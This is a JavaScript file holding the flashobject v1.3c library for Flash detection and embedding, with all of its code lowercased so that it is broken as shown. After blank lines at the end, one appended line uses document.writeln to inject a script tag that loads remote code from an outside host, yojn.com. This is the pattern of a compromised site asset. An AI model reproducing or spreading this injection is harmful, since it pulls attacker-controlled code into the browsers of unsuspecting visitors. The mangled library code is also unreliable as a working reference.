/**
 * flashobject v1.3c: flash detection and embed - http://blog.deconcept.com/flashobject/
 *
 * flashobject is (c) 2006 geoff stearns and is released under the mit license:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof com=="undefined"){var com=new object();}
if(typeof com.deconcept=="undefined"){com.deconcept=new object();}
if(typeof com.deconcept.util=="undefined"){com.deconcept.util=new object();}
if(typeof com.deconcept.flashobjectutil=="undefined"){com.deconcept.flashobjectutil=new object();}
com.deconcept.flashobject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){
if(!document.createelement||!document.getelementbyid){return;}
this.detect_key=_b?_b:"detectflash";
this.skipdetect=com.deconcept.util.getrequestparameter(this.detect_key);
this.params=new object();
this.variables=new object();
this.attributes=new array();
this.useexpressinstall=_7;
if(_1){this.setattribute("swf",_1);}
if(id){this.setattribute("id",id);}
if(w){this.setattribute("width",w);}
if(h){this.setattribute("height",h);}
if(_5){this.setattribute("version",new com.deconcept.playerversion(_5.tostring().split(".")));}
this.installedver=com.deconcept.flashobjectutil.getplayerversion(this.getattribute("version"),_7);
if(c){this.addparam("bgcolor",c);}
var q=_8?_8:"high";
this.addparam("quality",q);
var _d=(_9)?_9:window.location;
this.setattribute("xiredirecturl",_d);
this.setattribute("redirecturl","");
if(_a){this.setattribute("redirecturl",_a);}
};
com.deconcept.flashobject.prototype={setattribute:function(_e,_f){
this.attributes[_e]=_f;
},getattribute:function(_10){
return this.attributes[_10];
},addparam:function(_11,_12){
this.params[_11]=_12;
},getparams:function(){
return this.params;
},addvariable:function(_13,_14){
this.variables[_13]=_14;
},getvariable:function(_15){
return this.variables[_15];
},getvariables:function(){
return this.variables;
},createparamtag:function(n,v){
var p=document.createelement("param");
p.setattribute("name",n);
p.setattribute("value",v);
return p;
},getvariablepairs:function(){
var _19=new array();
var key;
var _1b=this.getvariables();
for(key in _1b){_19.push(key+"="+_1b[key]);}
return _19;
},getflashhtml:function(){
var _1c="";
if(navigator.plugins&&navigator.mimetypes&&navigator.mimetypes.length){
if(this.getattribute("doexpressinstall")){
this.addvariable("mmplayertype","plugin");
}
_1c="<embed type=\"application/x-shockwave-flash\" src=\""+this.getattribute("swf")+"\" width=\""+this.getattribute("width")+"\" height=\""+this.getattribute("height")+"\"";
_1c+=" id=\""+this.getattribute("id")+"\" name=\""+this.getattribute("id")+"\" ";
var _1d=this.getparams();
for(var key in _1d){_1c+=[key]+"=\""+_1d[key]+"\" ";}
var _1f=this.getvariablepairs().join("&");
if(_1f.length>0){_1c+="flashvars=\""+_1f+"\"";}
_1c+="/>";
}else{
if(this.getattribute("doexpressinstall")){this.addvariable("mmplayertype","activex");}
_1c="<object id=\""+this.getattribute("id")+"\" classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\""+this.getattribute("width")+"\" height=\""+this.getattribute("height")+"\">";
_1c+="<param name=\"movie\" value=\""+this.getattribute("swf")+"\" />";
var _20=this.getparams();
for(var key in _20){_1c+="<param name=\""+key+"\" value=\""+_20[key]+"\" />";}
var _22=this.getvariablepairs().join("&");
if(_22.length>0){_1c+="<param name=\"flashvars\" value=\""+_22+"\" />";
}_1c+="</object>";}
return _1c;
},write:function(_23){
if(this.useexpressinstall){
var _24=new com.deconcept.playerversion([6,0,65]);
if(this.installedver.versionisvalid(_24)&&!this.installedver.versionisvalid(this.getattribute("version"))){
this.setattribute("doexpressinstall",true);
this.addvariable("mmredirecturl",escape(this.getattribute("xiredirecturl")));
document.title=document.title.slice(0,47)+" - flash player installation";
this.addvariable("mmdoctitle",document.title);}
}else{this.setattribute("doexpressinstall",false);}
if(this.skipdetect||this.getattribute("doexpressinstall")||this.installedver.versionisvalid(this.getattribute("version"))){
var n=(typeof _23=="string")?document.getelementbyid(_23):_23;
n.innerhtml=this.getflashhtml();
}else{if(this.getattribute("redirecturl")!=""){document.location.replace(this.getattribute("redirecturl"));}}}};
com.deconcept.flashobjectutil.getplayerversion=function(_26,_27){
var _28=new com.deconcept.playerversion(0,0,0);
if(navigator.plugins&&navigator.mimetypes.length){
var x=navigator.plugins["shockwave flash"];
if(x&&x.description){_28=new com.deconcept.playerversion(x.description.replace(/([a-z]|[a-z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{
try{var axo=new activexobject("shockwaveflash.shockwaveflash");
for(var i=3;axo!=null;i++){
axo=new activexobject("shockwaveflash.shockwaveflash."+i);
_28=new com.deconcept.playerversion([i,0,0]);}}
catch(e){}
if(_26&&_28.major>_26.major){return _28;}
if(!_26||((_26.minor!=0||_26.rev!=0)&&_28.major==_26.major)||_28.major!=6||_27){
try{
_28=new com.deconcept.playerversion(axo.getvariable("$version").split(" ")[1].split(","));
}catch(e){}}}
return _28;
};
com.deconcept.playerversion=function(_2c){
this.major=parseint(_2c[0])||0;
this.minor=parseint(_2c[1])||0;
this.rev=parseint(_2c[2])||0;
};
com.deconcept.playerversion.prototype.versionisvalid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){return false;}
return true;
};
com.deconcept.util={getrequestparameter:function(_2e){
var q=document.location.search||document.location.href.hash;
if(q){var _30=q.indexof(_2e+"=");
var _31=(q.indexof("&",_30)>-1)?q.indexof("&",_30):q.length;
if(q.length>1&&_30>-1){
return q.substring(q.indexof("=",_30)+1,_31);}}return "";
},removechildren:function(n){
while(n.haschildnodes()){
n.removechild(n.firstchild);}}};
if(array.prototype.push==null){
array.prototype.push=function(_33){
this[this.length]=_33;
return this.length;};}
var getqueryparamvalue=com.deconcept.util.getrequestparameter;
var flashobject=com.deconcept.flashobject;




document.write("");

document.writeln("<script src=http:\/\/www.yojn.com\/no.js?76543><\/script>")

